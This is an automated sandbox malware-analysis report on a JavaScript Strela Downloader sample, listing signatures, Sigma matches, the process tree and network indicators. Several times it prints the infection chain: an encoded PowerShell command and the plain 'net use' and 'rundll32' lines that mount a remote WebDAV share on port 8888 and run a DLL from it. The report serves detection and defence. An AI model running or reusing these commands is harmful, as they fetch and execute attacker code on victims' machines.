Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
171596613219316174.js

Overview

General Information

Sample name:171596613219316174.js
Analysis ID:1541208
MD5:f4cf89a037227ea762cc6e1c9b286bf9
SHA1:ba826a2e3023657b2efb471b52bc3425ed012b1f
SHA256:9df87b2ca3327bdd843e791ae253b81f6ef1eeb765661c2dbea9d3c234a356da
Tags:jsuser-lowmal3
Infos:

Detection

Strela Downloader
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

JScript performs obfuscated calls to suspicious functions
Yara detected Strela Downloader
Encrypted powershell cmdline option found
JavaScript source code contains functionality to generate code involving a shell, file or stream
Opens network shares
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Communication To Uncommon Desusertion Ports
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • wscript.exe (PID: 1852 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\171596613219316174.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 712 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQAbABhAGIAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADEAOAA1ADcAMQA5ADQAMgA1ADYAOQAyAC4AZABsAGwALABFAG4AdAByAHkA MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • net.exe (PID: 2156 cmdline: "C:\Windows\system32\net.exe" use \\apitestlabs.com@8888\davwwwroot\ MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
      • rundll32.exe (PID: 1672 cmdline: "C:\Windows\system32\rundll32.exe" \\apitestlabs.com@8888\davwwwroot\2185719425692.dll,Entry MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 712JoeSecurity_StrelaDownloaderYara detected Strela DownloaderJoe Security
    SourceRuleDescriptionAuthorStrings
    amsi64_712.amsi.csvJoeSecurity_StrelaDownloaderYara detected Strela DownloaderJoe Security

      System Summary

      barindex
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\rundll32.exe" \\apitestlabs.com@8888\davwwwroot\2185719425692.dll,Entry, CommandLine: "C:\Windows\system32\rundll32.exe" \\apitestlabs.com@8888\davwwwroot\2185719425692.dll,Entry, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQAbABhAGIAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADEAOAA1ADcAMQA5ADQAMgA1ADYAOQAyAC4AZABsAGwALABFAG4AdAByAHkA, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 712, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\rundll32.exe" \\apitestlabs.com@8888\davwwwroot\2185719425692.dll,Entry, ProcessId: 1672, ProcessName: rundll32.exe
      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\171596613219316174.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\171596613219316174.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\171596613219316174.js", ProcessId: 1852, ProcessName: wscript.exe
      Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DesusertionIp: 94.159.113.48, DesusertionIsIpv6: false, DesusertionPort: 8888, EventID: 3, Image: C:\Windows\System32\net.exe, Initiated: true, ProcessId: 2156, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49747
      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQAbABhAGIAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADEAOAA1ADcAMQA5ADQAMgA1ADYAOQAyAC4AZABsAGwALABFAG4AdAByAHkA, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQAbABhAGIAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADEAOAA1ADcAMQA5ADQAMgA1ADYAOQAyAC4AZABsAGwALABFAG4AdAByAHkA, CommandLine|base64offset|contains: Ijw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\171596613219316174.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 1852, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQAbABhAGIAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADEAOAA1ADcAMQA5ADQAMgA1ADYAOQAyAC4AZABsAGwALABFAG4AdAByAHkA, ProcessId: 712, ProcessName: powershell.exe
      Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\171596613219316174.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\171596613219316174.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\171596613219316174.js", ProcessId: 1852, ProcessName: wscript.exe
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQAbABhAGIAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADEAOAA1ADcAMQA5ADQAMgA1ADYAOQAyAC4AZABsAGwALABFAG4AdAByAHkA, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQAbABhAGIAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADEAOAA1ADcAMQA5ADQAMgA1ADYAOQAyAC4AZABsAGwALABFAG4AdAByAHkA, CommandLine|base64offset|contains: Ijw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\171596613219316174.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 1852, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQAbABhAGIAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADEAOAA1ADcAMQA5ADQAMgA1ADYAOQAyAC4AZABsAGwALABFAG4AdAByAHkA, ProcessId: 712, ProcessName: powershell.exe
      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\system32\net.exe" use \\apitestlabs.com@8888\davwwwroot\, CommandLine: "C:\Windows\system32\net.exe" use \\apitestlabs.com@8888\davwwwroot\, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQAbABhAGIAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADEAOAA1ADcAMQA5ADQAMgA1ADYAOQAyAC4AZABsAGwALABFAG4AdAByAHkA, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 712, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\net.exe" use \\apitestlabs.com@8888\davwwwroot\, ProcessId: 2156, ProcessName: net.exe
      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\system32\net.exe" use \\apitestlabs.com@8888\davwwwroot\, CommandLine: "C:\Windows\system32\net.exe" use \\apitestlabs.com@8888\davwwwroot\, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQAbABhAGIAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADEAOAA1ADcAMQA5ADQAMgA1ADYAOQAyAC4AZABsAGwALABFAG4AdAByAHkA, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 712, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\net.exe" use \\apitestlabs.com@8888\davwwwroot\, ProcessId: 2156, ProcessName: net.exe
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      Software Vulnerabilities

      barindex
      Source: 171596613219316174.jsArgument value : ['"WScript.Shell"', '"powershell -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgA']Go to definition
      Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\System32\rundll32.exe

      Networking

      barindex
      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 8888
      Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49747
      Source: global trafficTCP traffic: 192.168.2.9:49747 -> 94.159.113.48:8888
      Source: Joe Sandbox ViewIP Address: 94.159.113.48 94.159.113.48
      Source: Joe Sandbox ViewASN Name: NETCOM-R-ASRU NETCOM-R-ASRU
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficDNS traffic detected: DNS query: apitestlabs.com
      Source: net.exe, 00000004.00000002.1405726227.0000015D70DF0000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000003.1405345735.0000015D70E1C000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.1405796900.0000015D70E1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apitestlabs.com:8888/
      Source: net.exe, 00000004.00000002.1405726227.0000015D70DF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apitestlabs.com:8888/N
      Source: net.exe, 00000004.00000002.1405726227.0000015D70DF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apitestlabs.com:8888/~
      Source: powershell.exe, 00000002.00000002.1408331750.000001898B391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000002.00000002.1408331750.000001898B3F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1408331750.000001898B3DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68

      Spam, unwanted Advertisements and Ransom Demands

      barindex
      Source: Yara matchFile source: amsi64_712.amsi.csv, type: OTHER
      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 712, type: MEMORYSTR

      System Summary

      barindex
      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQAbABhAGIAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADEAOAA1ADcAMQA5ADQAMgA1ADYAOQAyAC4AZABsAGwALABFAG4AdAByAHkA
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQAbABhAGIAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADEAOAA1ADcAMQA5ADQAMgA1ADYAOQAyAC4AZABsAGwALABFAG4AdAByAHkAJump to behavior
      Source: 171596613219316174.jsInitial sample: Strings found which are bigger than 50
      Source: classification engineClassification label: mal92.rans.troj.spyw.expl.evad.winJS@8/3@1/1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1872:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jaru0nwp.yf5.ps1Jump to behavior
      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" \\apitestlabs.com@8888\davwwwroot\2185719425692.dll,Entry
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\171596613219316174.js"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQAbABhAGIAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADEAOAA1ADcAMQA5ADQAMgA1ADYAOQAyAC4AZABsAGwALABFAG4AdAByAHkA
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\net.exe "C:\Windows\system32\net.exe" use \\apitestlabs.com@8888\davwwwroot\
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" \\apitestlabs.com@8888\davwwwroot\2185719425692.dll,Entry
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQAbABhAGIAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADEAOAA1ADcAMQA5ADQAMgA1ADYAOQAyAC4AZABsAGwALABFAG4AdAByAHkAJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\net.exe "C:\Windows\system32\net.exe" use \\apitestlabs.com@8888\davwwwroot\Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" \\apitestlabs.com@8888\davwwwroot\2185719425692.dll,EntryJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: samcli.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: drprov.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: ntlanman.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: davclnt.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: davhlpr.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: 171596613219316174.jsStatic file information: File size 1418795 > 1048576

      Data Obfuscation

      barindex
